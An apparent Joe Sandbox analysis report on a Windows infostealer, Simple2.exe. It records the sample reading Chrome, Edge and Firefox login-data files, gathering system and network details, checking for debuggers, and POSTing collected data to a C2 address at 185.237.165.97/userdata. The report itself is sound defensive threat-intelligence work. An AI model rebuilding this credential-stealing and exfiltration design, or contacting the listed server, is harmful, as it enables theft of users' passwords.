Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Simple2.exe

Overview

General Information

Sample name:Simple2.exe
Analysis ID:1569894
MD5:ed207427a25863f5524d616525943dd5
SHA1:6b7aa5224f76b8e09d3a8eefdb299e16b37c887f
SHA256:418b88c4cd03e7da38287324094b5af3843835d63e06fd44c0fb06903d7575b6
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Contains functionality to steal Chrome passwords or cookies
Tries to harvest and steal browser information (history, passwords, etc)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to enumerate network shares
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Detected potential crypto function
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)

Classification

  • System is w10x64
  • Simple2.exe (PID: 4600 cmdline: "C:\Users\user\Desktop\Simple2.exe" MD5: ED207427A25863F5524D616525943DD5)
    • conhost.exe (PID: 6544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Simple2.exeAvira: detected
Source: Simple2.exeReversingLabs: Detection: 54%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.4% probability
Source: Simple2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: eA:\VS Projects\systemConfigChecker\x64\Release\systemConfigChecker.pdb(( source: Simple2.exe
Source: Binary string: A:\VS Projects\systemConfigChecker\x64\Release\systemConfigChecker.pdb source: Simple2.exe
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6876B3A40 memset,NetUserEnum,NetApiBufferFree,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,0_2_00007FF6876B3A40
Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: WinHTTP/1.0Host: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: unknownHTTP traffic detected: POST /userdata HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WebKitFormBoundaryUser-Agent: WinHTTP/1.0Content-Length: 96979Host: 185.237.165.97
Source: Simple2.exe, 00000000.00000002.2204708270.00000265E20D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/
Source: Simple2.exe, 00000000.00000002.2204708270.00000265E20D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/8
Source: Simple2.exe, 00000000.00000002.2204708270.00000265E20F3000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2178452824.00000265E20D4000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2177140100.00000265E20D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/userdata
Source: Simple2.exe, 00000000.00000003.2177140100.00000265E20F3000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2202811260.00000265E20F3000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2178452824.00000265E20F3000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000002.2204708270.00000265E20F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/userdataF
Source: Simple2.exe, 00000000.00000002.2204708270.00000265E20D4000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2178452824.00000265E20D4000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2177140100.00000265E20D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/userdatall2
Source: Simple2.exe, 00000000.00000002.2204708270.00000265E20C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97:80/userdata
Source: Simple2.exe, 00000000.00000002.2204708270.00000265E20A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
Source: Simple2.exe, 00000000.00000002.2204708270.00000265E20C7000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2177140100.00000265E20C7000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2173843168.00000265E20C7000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2170631938.00000265E20C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org:80/
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6876B4CB00_2_00007FF6876B4CB0
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6876B1AC00_2_00007FF6876B1AC0
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6876B45700_2_00007FF6876B4570
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6876B55400_2_00007FF6876B5540
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6876B41F00_2_00007FF6876B41F0
Source: classification engineClassification label: mal68.spyw.winEXE@2/1@1/2
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6876B37A0 GetLogicalDrives,memset,GetDiskFreeSpaceExA,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6876B37A0
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6544:120:WilError_03
Source: Simple2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Simple2.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Simple2.exe, 00000000.00000003.2178452824.00000265E211A000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2178067191.00000265E214B000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2178067191.00000265E213B000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2177615969.00000265E2130000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2178752302.00000265E2127000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2177140100.00000265E211A000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2178891996.00000265E2155000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2177038783.00000265E2124000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Simple2.exeReversingLabs: Detection: 54%
Source: unknownProcess created: C:\Users\user\Desktop\Simple2.exe "C:\Users\user\Desktop\Simple2.exe"
Source: C:\Users\user\Desktop\Simple2.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: samlib.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: kernel.appcore.dllJump to behavior
Source: Simple2.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: Simple2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Simple2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Simple2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Simple2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Simple2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Simple2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Simple2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Simple2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: eA:\VS Projects\systemConfigChecker\x64\Release\systemConfigChecker.pdb(( source: Simple2.exe
Source: Binary string: A:\VS Projects\systemConfigChecker\x64\Release\systemConfigChecker.pdb source: Simple2.exe
Source: Simple2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Simple2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Simple2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Simple2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Simple2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Simple2.exeCode function: GetConsoleWindow,ShowWindow,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,GetSystemInfo,memset,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,GlobalMemoryStatusEx,memset,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,malloc,memset,GetAdaptersInfo,malloc,GetAdaptersInfo,free,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,memcpy,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,memset,NetGetJoinInformation,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,GetTimeZoneInformation,memset,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,memset,GetModuleFileNameA,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,0_2_00007FF6876B5540
Source: C:\Users\user\Desktop\Simple2.exe TID: 7124Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6876B5540 GetConsoleWindow,ShowWindow,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,GetSystemInfo,memset,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,GlobalMemoryStatusEx,memset,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,malloc,memset,GetAdaptersInfo,malloc,GetAdaptersInfo,free,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,memcpy,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,memset,NetGetJoinInformation,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,GetTimeZoneInformation,memset,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,memset,GetModuleFileNameA,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,0_2_00007FF6876B5540
Source: Simple2.exe, 00000000.00000002.2204708270.00000265E20A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp/
Source: Simple2.exe, 00000000.00000002.2204708270.00000265E2107000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2170294637.00000265E2107000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2173548196.00000265E2107000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2202811260.00000265E2107000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2178452824.00000265E2107000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2177140100.00000265E2107000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Simple2.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6876BBB0C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6876BBB0C
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6876BBCB0 SetUnhandledExceptionFilter,0_2_00007FF6876BBCB0
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6876BBB0C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6876BBB0C
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6876BB780 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6876BB780
Source: C:\Users\user\Desktop\Simple2.exeCode function: GetLocaleInfoA,GetLocaleInfoA,memset,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ,??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ,??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6876B3E70
Source: C:\Users\user\Desktop\Simple2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Users\user\Desktop\Simple2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6876BBD1C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6876BBD1C
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6876B5540 GetConsoleWindow,ShowWindow,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,GetSystemInfo,memset,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,GlobalMemoryStatusEx,memset,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,malloc,memset,GetAdaptersInfo,malloc,GetAdaptersInfo,free,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,memcpy,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,memset,NetGetJoinInformation,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,GetTimeZoneInformation,memset,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,memset,GetModuleFileNameA,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,0_2_00007FF6876B5540

Stealing of Sensitive Information

barindex
Source: C:\Users\user\Desktop\Simple2.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data0_2_00007FF6876B4CB0
Source: C:\Users\user\Desktop\Simple2.exeCode function: \AppData\Local\Chromium\User Data\Default\Login Data0_2_00007FF6876B4CB0
Source: C:\Users\user\Desktop\Simple2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\times.jsonJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
1
Virtualization/Sandbox Evasion
2
OS Credential Dumping
1
Network Share Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
1
Credentials In Files
2
System Time Discovery
Remote Desktop Protocol1
Data from Local System
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager11
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Process Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
System Network Configuration Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync25
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Simple2.exe54%ReversingLabsWin64.Trojan.Generic
Simple2.exe100%AviraTR/AVI.Agent.pvpsx
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://185.237.165.97:80/userdata0%Avira URL Cloudsafe
http://185.237.165.97/0%Avira URL Cloudsafe
http://185.237.165.97/userdata0%Avira URL Cloudsafe
http://185.237.165.97/userdatall20%Avira URL Cloudsafe
http://185.237.165.97/80%Avira URL Cloudsafe
http://185.237.165.97/userdataF0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
api.ipify.org
172.67.74.152
truefalse
    high
    fp2e7a.wpc.phicdn.net
    192.229.221.95
    truefalse
      high
      NameSourceMaliciousAntivirus DetectionReputation
      http://api.ipify.org/Simple2.exe, 00000000.00000002.2204708270.00000265E20A6000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        http://185.237.165.97:80/userdataSimple2.exe, 00000000.00000002.2204708270.00000265E20C7000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://api.ipify.org:80/Simple2.exe, 00000000.00000002.2204708270.00000265E20C7000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2177140100.00000265E20C7000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2173843168.00000265E20C7000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2170631938.00000265E20C7000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          http://185.237.165.97/Simple2.exe, 00000000.00000002.2204708270.00000265E20D4000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://185.237.165.97/userdataSimple2.exe, 00000000.00000002.2204708270.00000265E20F3000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2178452824.00000265E20D4000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2177140100.00000265E20D4000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://185.237.165.97/userdatall2Simple2.exe, 00000000.00000002.2204708270.00000265E20D4000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2178452824.00000265E20D4000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2177140100.00000265E20D4000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://185.237.165.97/userdataFSimple2.exe, 00000000.00000003.2177140100.00000265E20F3000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2202811260.00000265E20F3000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2178452824.00000265E20F3000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000002.2204708270.00000265E20F3000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://185.237.165.97/8Simple2.exe, 00000000.00000002.2204708270.00000265E20D4000.00000004.00000020.00020000.00000000.sdmpfalse
